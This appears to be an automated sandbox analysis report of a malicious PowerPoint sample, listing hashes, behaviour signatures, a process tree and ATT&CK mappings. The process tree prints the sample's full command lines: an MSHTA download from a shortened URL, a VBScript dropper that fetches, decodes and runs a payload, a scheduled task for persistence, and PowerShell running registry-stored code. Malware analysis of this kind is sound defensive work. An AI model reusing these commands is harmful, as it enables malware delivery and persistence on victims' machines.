Analysis

  • max time kernel
    151s
  • max time network
    60s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    05-03-2021 10:01

General

  • Target

    sample.ppt

  • Size

    224KB

  • MD5

    f93b770274956fb4b09e4962a45c32da

  • SHA1

    8e295f26e68ea595aaee521db9d29d39425ffbb1

  • SHA256

    56dd6d0c5eacf5a7ec7233c4acb4cf97df95f66ed5d4d4880dca62f6b4b27a69

  • SHA512

    98856b284df590ec1bf8e4edeab529315a3115a9f7d1a277328fa6ad4fcf25fa120b814a5714148df05386ff4d738523b3bec1617745631a766efab5cf95ced0

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 11 IoCs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 10 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 44 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 48 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\sample.ppt"
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of WriteProcessMemory
    PID:1784
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1116
      • C:\Windows\SysWOW64\MSHTA.exe
        MSHTA http://12384928198391823%12384928198391823@j.mp/dokdwkkwkdwkxxxdcjcdkwk
        2⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Adds Run key to start application
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:884
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c cd C:\Users\Public &@echo dim http_obj >>SiggiaW.vbs &@echo dim stream_obj >>SiggiaW.vbs &@echo dim shell_obj >>SiggiaW.vbs &@echo set http_obj = CreateObject("Microsoft.XMLHTTP") >>SiggiaW.vbs &@echo set stream_obj = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo set shell_obj = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo URL = "https://ia801408.us.archive.org/25/items/defender_202103/defender.txt" >>SiggiaW.vbs &@echo http_obj.open "GET", URL, False >>SiggiaW.vbs &@echo http_obj.send >>SiggiaW.vbs &@echo stream_obj.type = 1 >>SiggiaW.vbs &@echo stream_obj.open >>SiggiaW.vbs &@echo stream_obj.write http_obj.responseBody >>SiggiaW.vbs &@echo stream_obj.savetofile "C:\Users\Public\1.txt", 2 >>SiggiaW.vbs &@echo Dim xxx >>SiggiaW.vbs &@echo Set xxx = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set file = xxx.OpenTextFile("C:\Users\Public\FIX.VBS", 1) >>SiggiaW.vbs &@echo content = file.ReadAll >>SiggiaW.vbs &@echo content = StrReverse(content) >>SiggiaW.vbs &@echo Dim fso >>SiggiaW.vbs &@echo Dim fdsafdsa >>SiggiaW.vbs &@echo Dim oNode, fdsaa >>SiggiaW.vbs &@echo Const adTypeBinary = 1 >>SiggiaW.vbs &@echo Const adSaveCreateOverWrite = 2 >>SiggiaW.vbs &@echo Set oNode = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64") >>SiggiaW.vbs &@echo oNode.dataType = "bin.base64" >>SiggiaW.vbs &@echo oNode.Text = content >>SiggiaW.vbs &@echo Set fdsaa = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo fdsaa.Type = adTypeBinary >>SiggiaW.vbs &@echo tempdir = CreateObject("WScript.Shell").ExpandEnvironmentStrings("C:\Users\Public\bin.vbs") >>SiggiaW.vbs &@echo LocalFile = tempdir >>SiggiaW.vbs &@echo fdsaa.Open >>SiggiaW.vbs &@echo fdsaa.Write oNode.nodeTypedValue >>SiggiaW.vbs &@echo fdsaa.SaveToFile LocalFile, adSaveCreateOverWrite >>SiggiaW.vbs &@echo Set fso = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set fdsafdsa = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo If (fso.FileExists(LocalFile)) Then >>SiggiaW.vbs &@echo fdsafdsa.RUN (LocalFile) >>SiggiaW.vbs &@echo End If>>SiggiaW.vbs& SiggiaW.vbs &dEl SiggiaW.vbs
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:296
          • C:\Windows\SysWOW64\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Users\Public\SiggiaW.vbs"
            4⤵
            • Blocklisted process makes network request
            • Modifies system certificate store
            PID:1160
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""tutipajikhana"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%1230948@mylundisfarbigthenyouthink.blogspot.com/p/42.html""\"", 0 : window.close"\")
          3⤵
          • Creates scheduled task(s)
          PID:1276
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit ((gp HKCU:\Software).cutona)|IEX
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1964
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit ((gp HKCU:\Software).btfee)|IEX
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2084
        • C:\Windows\SysWOW64\taskkill.exe
          "C:\Windows\System32\taskkill.exe" /f /im winword.exe
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2132
        • C:\Windows\SysWOW64\taskkill.exe
          "C:\Windows\System32\taskkill.exe" /f /im Excel.exe
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2120
      • C:\Windows\SysWOW64\ping.exe
        ping
        2⤵
        • Process spawned unexpected child process
        • Runs ping.exe
        PID:1820
      • C:\Program Files (x86)\Microsoft Office\Office14\winword.exe
        winword
        2⤵
        • Drops file in Windows directory
        • Suspicious behavior: AddClipboardFormatListener
        • Suspicious use of SetWindowsHookEx
        PID:1908
      • C:\Windows\SysWOW64\ping.exe
        ping 127.0.0.1
        2⤵
        • Process spawned unexpected child process
        • Runs ping.exe
        PID:1280

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Execution

    Scheduled Task

    1
    T1053

    Persistence

    Registry Run Keys / Startup Folder

    1
    T1060

    Scheduled Task

    1
    T1053

    Privilege Escalation

    Scheduled Task

    1
    T1053

    Defense Evasion

    Modify Registry

    3
    T1112

    Install Root Certificate

    1
    T1130

    Discovery

    System Information Discovery

    1
    T1082

    Remote System Discovery

    1
    T1018

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      MD5

      8246648f63613d2c0f5e5a9f27c32aa0

      SHA1

      0ecf2a0c9c385b19b185da75b39b0e806f1e84d9

      SHA256

      1bc935b85500e513dbff8830c1329fd60c18bba7378fabe25ebbed3227899683

      SHA512

      d48febc8449b7fbc2fadd7c5066cf4c62c87fd8469c262f1ea2485c3c67b50ab2a195f131942701b470614db92c447ecd49e7cf42bbe8170dc636feb522bf390

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
      MD5

      2a35024af1b5856d7d79ef11fbbd228e

      SHA1

      de58beba122edc50a4697f77dde617c7fa13a938

      SHA256

      dd5006ad435ad4d953824292defcc3e42e5908b14ff6428f04e442bdc8d26664

      SHA512

      e2748bd914d8faed3a35e647be3956c886da7577549a7ddc509d0ac230767e52aaf38853bce8595169a1beb5662eeb65c0bb03e1d1492ec6019b5ba70636f2d2

    • C:\Users\Public\SiggiaW.vbs
      MD5

      49744d1b597f85a2691eeeccab3f5ec9

      SHA1

      53be659955bdf552d103ddd2251f97920c4830bd

      SHA256

      09af8affea2e91779fc5bd8e45c8eb4274f6cb0fe78cb96c77586f988958fb6f

      SHA512

      7d6036c802670bca691b26e3f22badfce85641354d67d460d38ff26edef248bcc6a51bf81406b11f2b6972525f8af6dfdcc26f298438280d001b03292f767e3f

    • memory/296-17-0x0000000000000000-mapping.dmp
    • memory/296-18-0x00000000760D1000-0x00000000760D3000-memory.dmp
      Filesize

      8KB

    • memory/884-8-0x0000000000000000-mapping.dmp
    • memory/932-9-0x000007FEF7510000-0x000007FEF778A000-memory.dmp
      Filesize

      2.5MB

    • memory/1116-5-0x0000000000000000-mapping.dmp
    • memory/1116-6-0x000007FEFBA51000-0x000007FEFBA53000-memory.dmp
      Filesize

      8KB

    • memory/1160-43-0x0000000002540000-0x0000000002544000-memory.dmp
      Filesize

      16KB

    • memory/1160-22-0x0000000000000000-mapping.dmp
    • memory/1276-20-0x0000000000000000-mapping.dmp
    • memory/1280-15-0x0000000000000000-mapping.dmp
    • memory/1784-4-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1784-16-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1784-2-0x0000000073BA1000-0x0000000073BA5000-memory.dmp
      Filesize

      16KB

    • memory/1784-7-0x0000000001E00000-0x0000000001E01000-memory.dmp
      Filesize

      4KB

    • memory/1784-3-0x0000000071251000-0x0000000071253000-memory.dmp
      Filesize

      8KB

    • memory/1820-10-0x0000000000000000-mapping.dmp
    • memory/1908-11-0x0000000000000000-mapping.dmp
    • memory/1908-12-0x0000000068721000-0x0000000068724000-memory.dmp
      Filesize

      12KB

    • memory/1964-33-0x0000000000E70000-0x0000000000E71000-memory.dmp
      Filesize

      4KB

    • memory/1964-38-0x00000000048C0000-0x00000000048C1000-memory.dmp
      Filesize

      4KB

    • memory/1964-19-0x0000000000000000-mapping.dmp
    • memory/1964-28-0x0000000067750000-0x0000000067E3E000-memory.dmp
      Filesize

      6.9MB

    • memory/1964-40-0x00000000048C2000-0x00000000048C3000-memory.dmp
      Filesize

      4KB

    • memory/2084-41-0x0000000002680000-0x0000000002681000-memory.dmp
      Filesize

      4KB

    • memory/2084-47-0x000000007EF20000-0x000000007EF21000-memory.dmp
      Filesize

      4KB

    • memory/2084-25-0x0000000000000000-mapping.dmp
    • memory/2084-37-0x0000000004A60000-0x0000000004A61000-memory.dmp
      Filesize

      4KB

    • memory/2084-39-0x0000000004A62000-0x0000000004A63000-memory.dmp
      Filesize

      4KB

    • memory/2084-31-0x0000000067750000-0x0000000067E3E000-memory.dmp
      Filesize

      6.9MB

    • memory/2084-79-0x0000000006A80000-0x0000000006A81000-memory.dmp
      Filesize

      4KB

    • memory/2084-78-0x0000000006A70000-0x0000000006A71000-memory.dmp
      Filesize

      4KB

    • memory/2084-44-0x00000000049F0000-0x00000000049F1000-memory.dmp
      Filesize

      4KB

    • memory/2084-35-0x0000000004AA0000-0x0000000004AA1000-memory.dmp
      Filesize

      4KB

    • memory/2084-49-0x00000000062F0000-0x00000000062F1000-memory.dmp
      Filesize

      4KB

    • memory/2084-54-0x00000000049B0000-0x00000000049B1000-memory.dmp
      Filesize

      4KB

    • memory/2084-55-0x0000000006380000-0x0000000006381000-memory.dmp
      Filesize

      4KB

    • memory/2084-62-0x00000000064C0000-0x00000000064C1000-memory.dmp
      Filesize

      4KB

    • memory/2084-63-0x0000000006500000-0x0000000006501000-memory.dmp
      Filesize

      4KB

    • memory/2084-64-0x00000000066D0000-0x00000000066D1000-memory.dmp
      Filesize

      4KB

    • memory/2120-26-0x0000000000000000-mapping.dmp
    • memory/2132-27-0x0000000000000000-mapping.dmp